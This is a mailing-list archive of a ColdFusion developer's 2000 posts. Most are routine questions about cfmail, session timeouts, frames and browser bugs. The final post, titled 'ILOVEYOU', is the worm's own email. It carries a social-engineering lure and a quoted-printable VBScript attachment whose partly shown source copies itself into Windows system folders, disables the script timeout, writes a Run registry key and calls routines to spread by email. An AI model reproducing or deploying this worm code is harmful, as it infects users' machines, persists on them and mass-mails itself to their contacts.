message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Form Problem

2000-07-25 Thread Tim Bahlke

 like  causes a line break after the closing tag.  A work around is
to put the  in its own 




Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: paul smith [mailto:[EMAIL PROTECTED]]
Sent: Monday, July 24, 2000 6:19 PM
To: [EMAIL PROTECTED]
Subject: Form Problem

I've tried 


Enter
Key Words to search Headings & Listings:

Selected>AllSelected>#GetCities.City#




--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Whats up with Macs and ?

2000-07-16 Thread Tim Bahlke

I had this exact same problem. I attended CF training with Dave a couple
weeks ago and mentioned it to him. He said that it was an IE Mac issue.  Try
using NN ... that took care of the problem for me


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Jeff Fongemie [mailto:[EMAIL PROTECTED]]
Sent: Saturday, July 15, 2000 10:07 PM
To: Cf-Talk
Subject: Whats up with Macs and ?


I am using cffile as in:



and when a user with a Mac tries to upload a photo, something happens so the
photo will not show up, as if it is corrupted or something. I can look on
the server and the file does get loaded, but a browser will not display the
picture??

Could it be a form issue before the cffile tag?:


I'm stuck on this one, it works fine for all PCs, and I think at least one
Mac, but not all macs.

Jeff Fongemie



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: session management

2000-07-14 Thread Tim Bahlke

I thought the CreateTimeSpan function syntax was days, hours, minutes,
seconds.

If this is correct (I am referencing CFML Language Reference in Studio) then
I have the Session and Application set to timeout in 1 hour.


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, July 14, 2000 10:10 AM
To: [EMAIL PROTECTED]
Subject: Re: session management

The SessionTimeOut and ApplicationTimeout has a 1 day before they can kill
the variables. That's what I think where the problem is.

Rob


<< Hey all,

 I am having a serious session management problem.  Here is my cfapplication
 tag ...

 

 When I was working with the application last night I had a cfid of 71.
This
 morning when I come back in (machine was shutdown last night) and logged
 back into the application I had a cfid of 71 and the stuff that I put into
 the shopping cart last night showed up.

 What am I doing wrong!!!

 --------
 Tim Bahlke, CIFO
 thinkcreate.com
 p. 336.230.0575
 f. 336.230.0083
  >>

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



rogue SMTP request

2000-07-14 Thread Tim Bahlke


The ColdFusion RDS Service on my machine (Win98 *yea, I know*) running on a
NAT'ed network, which is connected through a SDSL modem, is apparently
sending out SMTP requests, to where I have no idea.  The requests are not
getting a response nor are they timing out.  They are just pilling up in the
NAT table, which in turn is bringing our Internet connection down.

I have CF running on three basically identical machines and am only having
this problem with one.

Has anyone ever run into or heard of something like this before?  I have no
idea why CF is sending out the requests.  We have definitely narrowed the
problem down to CF, when we shut the RDS Service down on this particular
machine all is well again.

Thanks for any help/suggestions that you can send my way.

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



session management

2000-07-14 Thread Tim Bahlke

Hey all,

I am having a serious session management problem.  Here is my cfapplication
tag ...



When I was working with the application last night I had a cfid of 71.  This
morning when I come back in (machine was shutdown last night) and logged
back into the application I had a cfid of 71 and the stuff that I put into
the shopping cart last night showed up.

What am I doing wrong!!!


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Need Mail Help Too!!!

2000-07-13 Thread Tim Bahlke

I propose we change the name of this list to cfmail-talk


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083




--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



cfmail

2000-07-13 Thread Tim Bahlke

Can I have the 'TO' and 'From' point to the same address?  With what I am
trying to accomplish, is doesn't mean a hill of beans who the message comes
from ... it's just really a notification that something has happened.

Thanks in advance

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE:

2000-07-13 Thread Tim Bahlke

I did verify the connection to server1.clicktex.com through the
administrator.

Yesterday, when I was sending (or trying to send) the test message I was
getting no error and nothing was showing up in the logs, even hours after.
However, this morning I do have log entries.

How come the delay?  Does CF server hold the messages to send out until a
certain number are spooled or until a specific amount of time


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Conrad, Christopher [mailto:[EMAIL PROTECTED]]
Sent: Thursday, July 13, 2000 9:25 AM
To: [EMAIL PROTECTED]
Subject: RE: 

put the your mail server "server1.clicktex.com" into your CF admin mail
settings and try to verify.

Chris

Christopher Conrad
Victoria's Secret Catalogue
http://www.VictoriasSecret.com
Senior.Programmer.Analyst
614.337.5653
[EMAIL PROTECTED]


> -Original Message-
> From: Tim Bahlke [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, July 13, 2000 9:07 AM
> To:   [EMAIL PROTECTED]
> Subject:  RE: 
>
> I have looked in the Undeliverable Directory, nothing
>
> The connection to the server in CF Administrator has been verified
>
> I'm using a different server other then mine to send the emails.  Could
> that
> be the problem ... do I need to send the message form the same server that
> the from address is associated with?
>
> 
> Tim Bahlke, CIFO
> thinkcreate.com
> p. 336.230.0575
> f. 336.230.0083
>
> -Original Message-
> From: Gordon Burns [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, July 13, 2000 1:18 AM
> To: [EMAIL PROTECTED]
> Subject: Re: 
>
> Hi Tim,
>
> Have you looked in the Undelivered Directory?
>
> Have you made sure you can connect to the SMTP server?
>
> Is thinkcreate.com allowed to send mail through the smtp server you are
> using?
>
> Regards
>
> Gordon
>
>
>
>
>
> At 21:27 12/07/00 -0700 David Shadovitz said
> >Tim,
> >Are you sure nothing is happening?  I'd try using your own email address
> >as the "To" field.
> >-David
> >
> >On Wed, 12 Jul 2000 17:27:58 -0400 "Tim Bahlke" <[EMAIL PROTECTED]>
> >writes:
> >> I have never had luck getting cfmail to work.  How does this look to
> >> y'all:
> >>
> >>  >> SUBJECT="Order
> >> #URL.sessionid#" SERVER="server1.clicktex.com">
> >>
> >> Message
> >>
> >> 
> >>
> >> When I process this page nothing happens, no email, no error,
> >> nothing, and
> >> nothing is showing up in the logs ... nothing
> >
> >YOU'RE PAYING TOO MUCH FOR THE INTERNET!
> >Juno now offers FREE Internet Access!
> >Try it today - there's no risk!  For your FREE software, visit:
> >http://dl.www.juno.com/get/tagj.
> >---
> ---
> >Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
> >To Unsubscribe visit
> http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_t
> alk or send a message to [EMAIL PROTECTED] with
> 'unsubscribe' in the body.
> >
> --
> --
> --
> Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
> To Unsubscribe visit
> http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
> send a message to [EMAIL PROTECTED] with 'unsubscribe' in
> the body.
>
>
> --
> 
> Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
> To Unsubscribe visit
> http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
> send a message to [EMAIL PROTECTED] with 'unsubscribe' in
> the body.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE:

2000-07-13 Thread Tim Bahlke

The mail script is on the machine that I am referencing with
Server="server".  I am just using my email as the sender.  And now I have
changed it to go to me and come from someone else (address local to the
server housing the script)  for testing purposes.

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Todd Ashworth [mailto:[EMAIL PROTECTED]]
Sent: Thursday, July 13, 2000 9:17 AM
To: [EMAIL PROTECTED]
Subject: Re: 

If you are trying to end E-mail from one machine to another machine using a
3rd machine as a go-between, your messages won't make it if the machine is
set not to relay mail.  If you have access to the mail server, you might
want to see if setting up a trusted domain for the domain you are trying to
send from.  I wouldn't recomend turning on relaying by default, or you are
just inviting some spammer to come in and hose your server.

Todd Ashworth

- Original Message -----
From: "Tim Bahlke" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, July 13, 2000 9:06 AM
Subject: RE: 


| I have looked in the Undeliverable Directory, nothing
|
| The connection to the server in CF Administrator has been verified
|
| I'm using a different server other then mine to send the emails.  Could
that
| be the problem ... do I need to send the message form the same server that
| the from address is associated with?
|
| 
| Tim Bahlke, CIFO
| thinkcreate.com
| p. 336.230.0575
| f. 336.230.0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE:

2000-07-13 Thread Tim Bahlke

I have looked in the Undeliverable Directory, nothing

The connection to the server in CF Administrator has been verified

I'm using a different server other then mine to send the emails.  Could that
be the problem ... do I need to send the message form the same server that
the from address is associated with?

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Gordon Burns [mailto:[EMAIL PROTECTED]]
Sent: Thursday, July 13, 2000 1:18 AM
To: [EMAIL PROTECTED]
Subject: Re: 

Hi Tim,

Have you looked in the Undelivered Directory?

Have you made sure you can connect to the SMTP server?

Is thinkcreate.com allowed to send mail through the smtp server you are
using?

Regards

Gordon





At 21:27 12/07/00 -0700 David Shadovitz said
>Tim,
>Are you sure nothing is happening?  I'd try using your own email address
>as the "To" field.
>-David
>
>On Wed, 12 Jul 2000 17:27:58 -0400 "Tim Bahlke" <[EMAIL PROTECTED]>
>writes:
>> I have never had luck getting cfmail to work.  How does this look to
>> y'all:
>>
>> > SUBJECT="Order
>> #URL.sessionid#" SERVER="server1.clicktex.com">
>>
>> Message
>>
>> 
>>
>> When I process this page nothing happens, no email, no error,
>> nothing, and
>> nothing is showing up in the logs ... nothing
>
>YOU'RE PAYING TOO MUCH FOR THE INTERNET!
>Juno now offers FREE Internet Access!
>Try it today - there's no risk!  For your FREE software, visit:
>http://dl.www.juno.com/get/tagj.
>---
---
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_t
alk or send a message to [EMAIL PROTECTED] with
'unsubscribe' in the body.
>

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE:

2000-07-13 Thread Tim Bahlke

I have switched to doing this, and I am receiving nothing.


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: David Shadovitz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, July 13, 2000 12:28 AM
To: [EMAIL PROTECTED]
Subject: Re: 

Tim,
Are you sure nothing is happening?  I'd try using your own email address
as the "To" field.
-David

On Wed, 12 Jul 2000 17:27:58 -0400 "Tim Bahlke" <[EMAIL PROTECTED]>
writes:
> I have never had luck getting cfmail to work.  How does this look to
> y'all:
>
>  SUBJECT="Order
> #URL.sessionid#" SERVER="server1.clicktex.com">
>
> Message
>
> 
>
> When I process this page nothing happens, no email, no error,
> nothing, and
> nothing is showing up in the logs ... nothing

YOU'RE PAYING TOO MUCH FOR THE INTERNET!
Juno now offers FREE Internet Access!
Try it today - there's no risk!  For your FREE software, visit:
http://dl.www.juno.com/get/tagj.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



cf-talk@houseoffusion.com

2000-07-12 Thread Tim Bahlke

I have never had luck getting cfmail to work.  How does this look to y'all:



Message



When I process this page nothing happens, no email, no error, nothing, and
nothing is showing up in the logs ... nothing

Thanks

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Browser Issue

2000-06-29 Thread Tim Bahlke

The problem was due to the fact that NN was setup not to accept cookies
(which opens my eyes to a whole 'nother issue I need to address).

Thanks to Dana and Anthony for pointing me in the right direction!

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083




--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Browser Issue

2000-06-28 Thread Tim Bahlke

Netscape 4.7 on PC cannot read my session variables.  Netscape 4.* on Mac
and IE both on PC and MAC are just fine.  Is this a known issue, or just
happening to me?  I thought since CF was server side the browser or platform
would not matter.


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Error Msg

2000-06-26 Thread Tim Bahlke

Every once in a while, I get a message box that pops up in studio 4.5.1
saying "Canvas does not allow".  I hit OK but it just keeps coming up.  I
have to cycle studio to work again.  It seems to happen most when I come
back to studio after looking at my page in the browser (IE).

Anyone else getting this?

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



URL parameter in a Frame

2000-06-23 Thread Tim Bahlke

I ask for some advice on if this is the best way to pass a URL parameter to
a nested frame.

In application.cfm I have





The frame cannot access the URL parameter directly so I though of this work
around.  Am I going to run into problems down the road if I do this?

Thanks.


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE:

2000-06-22 Thread Tim Bahlke

This is just the advice I was looking for.  Thanks Justin!


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Justin v0.9 MacCarthy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, June 22, 2000 3:12 PM
To: [EMAIL PROTECTED]
Subject: Re: 

Tim, you might want to combine CF and JavaScript for what you want to do.
For example :


SELECT Name
FROM dB



#name#


Hope that helps

~JustinMacCarthy


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



cf-talk@houseoffusion.com

2000-06-22 Thread Tim Bahlke

Can I call a  function through a link like a javascript function.

Like ...

blah


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Native Drivers

2000-06-21 Thread Tim Bahlke

Sorry to be flooding the list today ... but there's just so much gosh darn
knowledge out there ...

Can I use an Oracle native driver on Windows Professional?  If so can
someone direct me as to where I can find how to install and configure?

 Thanks again.

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



URL parameter and Frames

2000-06-21 Thread Tim Bahlke

Is there a secret to accessing a URL parameter from a deeply nested frame?



Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Looping through a structure

2000-06-21 Thread Tim Bahlke

When I run the code below, the keys are outputted in alphabetic order, not
the order that they are in the structure (which is of course what I am
after).

Can someone point me in the right direction ... *please*?

And while we're at it ... is there a way I can output the name of the
structure without using  or
another ?

THANKS

















#key#: 



------
Tim Bahlke, CIFO
Graphica
www.thinkcreate.com
p.336.230.0575
f. 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Charlotte CFUG

2000-06-06 Thread Tim Bahlke

Does anyone know when the next meeting is for the Charlotte CFUG?

--
Tim Bahlke
thinkcreate.com
P: 336.230.0575



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Where the data?

2000-06-03 Thread Tim Bahlke

I have a simple form that creates a username and password for an individual.
I have a SQL INSERT statement that puts the usernames and passwords into
Access.  For some reason the data is now not going into the DB (it used to),
and I get no errors.  However, when I perform a query to retrieve the all
usernames and passwords, the usernames and passwords that are not in the DB
but I added are there along with the ones that ARE in the DB.

??

Where are they going/coming from ... the registry ... if so where?

--
Tim Bahlke
thinkcreate.com
P: 336.230.0575



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: CF hosting directory

2000-05-24 Thread Tim Bahlke

I think there should be an area where individuals can provide comments on
their experiences with the hosting company.  I can fill up the
WebHosting.com area!

--
Tim Bahlke
thinkcreate.com
P: 336.230.0575

-Original Message-
From: Leong Yew [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 23, 2000 4:49 AM
To: [EMAIL PROTECTED]
Subject: CF hosting directory

Hello everyone,

I'm thinking of starting a searchable directory of ColdFusion hosting
companies and their plans. Since there are plenty of general hosting
directories out there, the intention of this directory is to make it
possible for users to make as detailed searches as possible concerning the
level of CF hosting offered.

I've got a list of search fields in mind and I was wondering if all you good
people out there could suggest what additional ones you'd like to see.

Alternatively does anyone of you think there are too many fields and should
any be removed?

Categories
CF Server Details
1.  CF version and product level
2.  Restricted Tags
3.  Third Party Tags and Components available
Other Application Servers Available
1.  ASP
2.  CGI
3.  PHP
4.  server side Javascript
Database Connectivity
1.  MS SQL
2.  MySQL
3.  MS Access
4.  Oracle
5.  Other

E-mail:
1.  Own aliased POP and SMTP servers
2.  POP accounts
3.  Autoresponder
4.  Server type: IMAIL, MAILMAX, SENDMAIL, INFUSION
5.  Mailing Lists

Server Info
1.  Type â€" Unix, NT
2.  Own IP number
3.  SSL
4.  Telnet access
5.  Control Panel
6.  Connection type: T1s? T3s? OC3s?


Price and Package
Setup Fee
Monthly
Diskspace and bandwidth
Prepay discounts?

Company Info
General Server Info
-   Location?
-   Number of staff
Technical Support
1.  Toll free number?
2.  24/7 support?
Payment Accepted
1.  Credit card
2.  personal check
Reseller Plans Available?


Leong


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=sts&body=sts/cf_talk or send
a message to [EMAIL PROTECTED] with 'unsubscribe' in the
body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: css and coldfusion

2000-05-22 Thread Tim Bahlke

I'm sure you already know this but ... doesn't work in NN.

------
Tim Bahlke
thinkcreate.com
P: 336.230.0575

-Original Message-
From: Brandon Whitaker [mailto:[EMAIL PROTECTED]]
Sent: Saturday, May 20, 2000 12:29 PM
To: [EMAIL PROTECTED]
Subject: Re: css and coldfusion

>I know this may be a bit OT but Im trying to use cfinclude to incorporate
>css in my pages but for some reason the hover action (underline attribute)
>is only working for some links, not all. I am using the following code for
>the CSS:
>


I had this same problem myself, Shane...it has to do with the order in which
you specify the styles; if you specify a hover BEFORE the visited, 'visited'
attributes will take precedence over 'hover' attribs.

Try this order and see if it helps:
a:link {attribs}
a:visited {attribs}
a:active {attribs}
a:hover {attribs}

HTH! HAND!

Brandon Whitaker
[EMAIL PROTECTED]
---
"It'll get used by the same people using Opera.  People dressed in black
wearing berets."
- Dave Watts, on Mozilla
"The net interprets censorship as damage and routes around it."
- John Gilmore



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Database access problem

2000-05-18 Thread Tim Bahlke

If you're using Win98 there is fix at the Allaire site that might fix the
problem.

------
Tim Bahlke
thinkcreate.com
P: 336.230.0575

-Original Message--
From: "Peter Tilbrook" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Sent: May 16, 2000 11:05:03 PM GMT
Subject: RE: Database access problem


Have you installed the Microsoft Data Access software? (see
http://www.microsoft.com/data). Also have you already setup your ODBC
connections?

: quoted-printable

Hi!

My problem is that when I try to access to my database from the =
Studio 4.5 resource tab, in localhost, i get an error message "the =
connection to the server cannot be established". Server Enterprise is =
running and the test installation is OK. Please, help!

Thanks in advance.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.
---
FREE! The World's Best Email Address @email.com
Reserve your name now at http://www.email.com



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: FAO Schwarz Selects Allaire's Internet Business Platform

2000-05-10 Thread Tim Bahlke

Thanks for the FYI.  We are working with a large client right now that we
are trying to get to buy into Allaire's Internet Business Platform.
Anything else that y'all might have would also be greatly appreciated.

Thanks once again.

--------
Tim Bahlke
Graphica
www.thinkcreate.com
P: 336.230.0575
F: 336.230.0083

-Original Message-
From: Steve Aylor [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 09, 2000 4:11 PM
To: [EMAIL PROTECTED]
Subject: FAO Schwarz Selects Allaire's Internet Business Platform

FAO Schwarz Selects Allaire's Internet Business Platform

http://biz.yahoo.com/prnews/000509/ma_allaire_1.html



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



WOW what a day

2000-05-04 Thread Tim Bahlke

It seems like everyone has been hit by the LoveBug.  It’s like warfare
keeping it away.

I hope everyone is managing OK.


Tim Bahlke
Graphica
www.thinkcreate.com
P: 336.230.0575
F: 336.230.0083



--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



ILOVEYOU

2000-05-04 Thread Tim Bahlke

This is a multi-part message in MIME format.

--=_NextPart_000_0006_01BFB5AE.554845C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit


kindly check the attached LOVELETTER coming from me.
--=_NextPart_000_0006_01BFB5AE.554845C0
Content-Type: application/octet-stream;
name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

rem  barok -loveletter(vbe) =0Drem by: 
spyder  / =
 [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  Manila,Philippines=0DOn =
Error Resume Next=0Ddim =
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow=0Deq=3D""=0Dctr=3D0=0D=
Set fso =3D CreateObject("Scripting.FileSystemObject")=0Dset file =3D =
fso.OpenTextFile(WScript.ScriptFullname,1)=0Dvbscopy=3Dfile.ReadAll=0Dmai=
n()=0Dsub main()=0DOn Error Resume Next=0Ddim wscr,rr=0Dset =
wscr=3DCreateObject("WScript.Shell")=0Drr=3Dwscr.RegRead("HKEY_CURRENT_US=
ER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")=0Dif =
(rr>=3D1) then=0Dwscr.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"=0Dend if=0DSet dirwin =3D =
fso.GetSpecialFolder(0)=0DSet dirsystem =3D =
fso.GetSpecialFolder(1)=0DSet dirtemp =3D fso.GetSpecialFolder(2)=0DSet =
c =3D =
fso.GetFile(WScript.ScriptFullName)=0Dc.Copy(dirsystem&"\MSKernel32.vbs")=
=0Dc.Copy(dirwin&"\Win32DLL.vbs")=0Dc.Copy(dirsystem&"\LOVE-LETTER-FOR-YO=
U.TXT.vbs")=0Dregruns()=0Dhtml()=0Dspreadtoemail()=0Dlistadriv()=0Dend =
sub=0Dsub regruns()=0DOn Error Resume Next=0DDim =
num,downread=0Dregcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
